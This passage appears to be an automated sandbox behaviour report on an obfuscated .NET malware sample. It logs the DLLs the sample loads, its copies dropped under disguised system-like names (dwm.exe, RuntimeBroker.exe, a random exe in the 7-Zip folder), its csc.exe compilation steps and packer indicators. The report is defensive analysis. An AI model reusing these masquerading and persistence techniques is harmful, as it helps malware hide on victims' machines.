                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: sspicli.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: mscoree.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: apphelp.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: version.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: wldp.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: profapi.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: sspicli.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: mscoree.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: version.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: wldp.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: profapi.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: apphelp.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: sspicli.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: mscoree.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: version.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: wldp.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: profapi.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: sspicli.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: mscoree.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: version.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: wldp.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: profapi.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: apphelp.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: sspicli.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: mscoree.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: version.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: wldp.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: profapi.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeDirectory created: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeDirectory created: C:\Program Files\7-Zip\Lang\3b1a2dfabaeac3Jump to behavior
                              Source: jW5TA1J9Z1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: jW5TA1J9Z1.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                              Source: jW5TA1J9Z1.exeStatic file information: File size 1960448 > 1048576
                              Source: jW5TA1J9Z1.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1de200
                              Source: jW5TA1J9Z1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: ;C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.pdb source: jW5TA1J9Z1.exe, 00000000.00000002.1293145015.0000000003547000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: ;C:\Users\user\AppData\Local\Temp\0fn2jk23\0fn2jk23.pdb source: jW5TA1J9Z1.exe, 00000000.00000002.1293145015.0000000003547000.00000004.00000800.00020000.00000000.sdmp

                              Data Obfuscation

                              barindex
                              .NET source code contains method to dynamically call methods (often used by packers)
                              Source: jW5TA1J9Z1.exe, EZlYGB3v2qc5R98kuh4.cs.Net Code: Type.GetTypeFromHandle(Vr7UOIgCCoAAYnsOWtk.h8kAtlqZqYd(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Vr7UOIgCCoAAYnsOWtk.h8kAtlqZqYd(16777245)),Type.GetTypeFromHandle(Vr7UOIgCCoAAYnsOWtk.h8kAtlqZqYd(16777259))})
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline"
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0fn2jk23\0fn2jk23.cmdline"
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0fn2jk23\0fn2jk23.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 0_2_00007FFAACCE4BAB push cs; retf 0_2_00007FFAACCE4BB7
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 0_2_00007FFAACCE536D push ebp; ret 0_2_00007FFAACCE5370
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 0_2_00007FFAACCE12CD push eax; ret 0_2_00007FFAACCE12D9
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 0_2_00007FFAACE43EE0 pushad ; ret 0_2_00007FFAACE43EF8
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 0_2_00007FFAACE43EC6 pushad ; ret 0_2_00007FFAACE43EC7
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 0_2_00007FFAACE404A8 push E8FFFE7Eh; iretd 0_2_00007FFAACE404AD
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 0_2_00007FFAAD0DF535 push eax; ret 0_2_00007FFAAD0DF536
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB483EF0 pushad ; ret 23_2_00007FFAAB483F6D
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB477D89 push ecx; retf 23_2_00007FFAAB477D8C
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB47753D push ebx; iretd 23_2_00007FFAAB47756A
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB4412CD push eax; ret 23_2_00007FFAAB4412D9
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB444BAB push cs; retf 23_2_00007FFAAB444BB7
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB44536D push ebp; ret 23_2_00007FFAAB445370
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB5A04A8 push E8FFFE7Eh; iretd 23_2_00007FFAAB5A04AD
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB5A3EE0 pushad ; ret 23_2_00007FFAAB5A3EF8
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB5A3EC6 pushad ; ret 23_2_00007FFAAB5A3EC7
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB96D9DA push eax; ret 23_2_00007FFAAB96D994
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 23_2_00007FFAAB96D968 push eax; ret 23_2_00007FFAAB96D994
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 24_2_00007FFAAB4712CD push eax; ret 24_2_00007FFAAB4712D9
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 24_2_00007FFAAB474BAB push cs; retf 24_2_00007FFAAB474BB7
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeCode function: 24_2_00007FFAAB47536D push ebp; ret 24_2_00007FFAAB475370
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 27_2_00007FFAAB4512CD push eax; ret 27_2_00007FFAAB4512D9
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 27_2_00007FFAAB454BAB push cs; retf 27_2_00007FFAAB454BB7
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeCode function: 27_2_00007FFAAB45536D push ebp; ret 27_2_00007FFAAB455370
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeCode function: 30_2_00007FFAAB4412CD push eax; ret 30_2_00007FFAAB4412D9
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeCode function: 30_2_00007FFAAB444BAB push cs; retf 30_2_00007FFAAB444BB7
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeCode function: 30_2_00007FFAAB44536D push ebp; ret 30_2_00007FFAAB445370
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 31_2_00007FFAAB4712CD push eax; ret 31_2_00007FFAAB4712D9
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 31_2_00007FFAAB474BAB push cs; retf 31_2_00007FFAAB474BB7
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 31_2_00007FFAAB47536D push ebp; ret 31_2_00007FFAAB475370
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeCode function: 31_2_00007FFAAB4A752B push ebx; iretd 31_2_00007FFAAB4A756A
                              Source: jW5TA1J9Z1.exeStatic PE information: section name: .text entropy: 7.553608083833407
                              Source: MQYzEFytUKABjmoxvNTPTwUrcL.exe.0.drStatic PE information: section name: .text entropy: 7.553608083833407
                              Source: RuntimeBroker.exe.0.drStatic PE information: section name: .text entropy: 7.553608083833407
                              Source: MQYzEFytUKABjmoxvNTPTwUrcL.exe0.0.drStatic PE information: section name: .text entropy: 7.553608083833407
                              Source: dwm.exe.0.drStatic PE information: section name: .text entropy: 7.553608083833407
                              Source: jW5TA1J9Z1.exe, SrrKHXjFwiKjPYkCZY1.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                              Source: jW5TA1J9Z1.exe, PWQatpQTAXsqcyQcODf.csHigh entropy of concatenated method names: 'qpoQ7Z5iqa', 'k0pQutAhCo', 'C0NQtb8Ln9', 'gvADKET5QVGIb7XffVQb', 'g5sAXwT5tCRRcJqwvqHR', 'UKDOhwT5Y4Tt6K53E23D', 'php2XwT5de9PRwbQSCcP', 'qmnqPoT5oMwiKq4Z080f', 'r0UexBT52tnCbf7u8Rse', 'YBk6cVT5hTgMAnO90DoM'
                              Source: jW5TA1J9Z1.exe, nWOjSBQFk8vOVhLgRcA.csHigh entropy of concatenated method names: 'yeiQ5Oc38t', 'NjPQfiVnir', 'gZsD8ZT54FdxPooHayOO', 's9Tu6XT5JpZwI4cD3V0L', 'YMRBIKT5NfFTTAplCEJg', 'U0SirBT5e6j6xQhVoW1Q', 'soqIrET59XfACtUWrGNt', 'nlOZReT5BFDy9A6bw5nM', 'am6H7NT56omoDfBh67vR', 'z6EaAxT53JJQ0mHA3nrU'
                              Source: jW5TA1J9Z1.exe, qlcDg45MrXuLA0beHQo.csHigh entropy of concatenated method names: 'Close', 'qL6', 'Cyh5Lww85C', 'hqa50lxyit', 'nU85RJ9JDY', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                              Source: jW5TA1J9Z1.exe, FF267yQp8hZ996Sj7EH.csHigh entropy of concatenated method names: 'qrRQaTids6', 'knqOsNT5mFhVsRVdO5Se', 'KsaXeyT5W4JWZEjxUAI5', 'cxC07fT5Z3I2sPUV8gWS', 'VgOZFeT5IZfxiM3EEfhH', 'CcY3VuT5XOrEN61MtYpQ', 'yX7QskFvIO', 'CpGQrx7obO', 'jPvQOgRQL3', 'zMBQ8SwdXu'
                              Source: jW5TA1J9Z1.exe, rY1fBdHIGTjZaRvpRZ7.csHigh entropy of concatenated method names: 'vlAHWmisxy', 'D2YHXOdKFT', 'xC3HV5j5Wl', 'Q9Cj3TTPcdQwDOS0YqeZ', 'RAU3YATPnSk9nKKMOkMG', 'UiCQCbTPbJnekv8lFiDv', 'WeD1O1TPvmE9SQftsOFM', 'vfOLFSTPEtMPFRX4XuN5', 'xUhMHPTPpUL1bocqpJFn'
                              Source: jW5TA1J9Z1.exe, OhHjZFo8EFJUJERkeGY.csHigh entropy of concatenated method names: 'y1tIqmTLKMpbaBf5nvY7', 'B07isMTLaFMMTX7Lc87L', 'nLrViBTLjTPA4u1lju0d', 'F5lnoYTLFKRovyK6a0LY', 'mrbCqk2Xj7', 'LZWrNsTLMVEksZZxv2Er', 'ppnDptTL5svoB4ooqIwu', 'qdb0ccTLfZT6puKigpmb', 'c9Ww0lTLwNPevYxU2hSu', 'E1XXxaTLLOaAOHH5JqUL'
                              Source: jW5TA1J9Z1.exe, k5BZk8dcRDl2peQW6aQ.csHigh entropy of concatenated method names: 'KSwdHwFCMA', 'd6t4SfTf5IEDXAgGbqSd', 'eXnD2xTfFvnwreJ4imJ0', 'nZI3XLTfxoWXUVZ3Zfai', 'GKrGRdTffvd5Fw9d6Cae', 'MwJdEXjmj0', 'zlLwYaTfa5WHaAqGPtfg', 'U6xPh9TfjTRi6KW2fCi2', 'WUM1JFTf1jkwpSIYlDAl', 'mw2821TfihceD5QonN3y'
                              Source: jW5TA1J9Z1.exe, VO4ITxp90sAhpAM9SDU.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'UHqTdGvt0wR', 'nfVTuW3JiDV', 'QTFRAbTlb8NjL7iedjBR', 'vR4YxeTlcjYv1rQBLRCI', 'gXq0PyTlvcXpj9mwKsmm', 'q7rHcGTlEDwOqOCuF9RY', 'tTP315TlpvAuI7J09CIy'
                              Source: jW5TA1J9Z1.exe, UussgAANk5uadFIjTA5.csHigh entropy of concatenated method names: 'Jtd7Qw6yvk', 'umJGxQTa3YjkXNx5OFpo', 'oOSMH6TaUfPbEC02CUXa', 'LdBdvHTagWX6RFyvvQEd', 'HRRdvdTaBd2DJepXqce2', 'YjXPijTa6k17MxBq2sRA', 'p4ldWCTaqbWbQsqMHeeW', 'pGPT75TaznoS5UJOriAf', 'FDb7SOkkdb', 'GpE7Aj1ecE'
                              Source: jW5TA1J9Z1.exe, WW58LLiP3STsUONtVUC.csHigh entropy of concatenated method names: 'uyMigR5I9d', 'a27izN7x3o', 'a87iImKh3E', 'oiTimohILb', 'v2ciW68uMG', 'KASiX1eRdk', 'Jc2iVDIT1c', 'M5piJ6uLZQ', 'n3iiNJGiyW', 'GXRi4VfwgI'
                              Source: jW5TA1J9Z1.exe, GnWAHyt4LJuCRayDCaU.csHigh entropy of concatenated method names: 'ClhtUUJ8sP', 'Vqxtgnyu55', 'dIctqCWDH2', 't8rtzj47qj', 'u9oYS7ip8E', 'DFXYTjdS2s', 'GucYAbyhwv', 'PyMyIkTxGylov3Z1eT1w', 'Y1qUOFTxCmyqt5uCV1XZ', 'zfexy3TxhGvaAVeLA4ot'
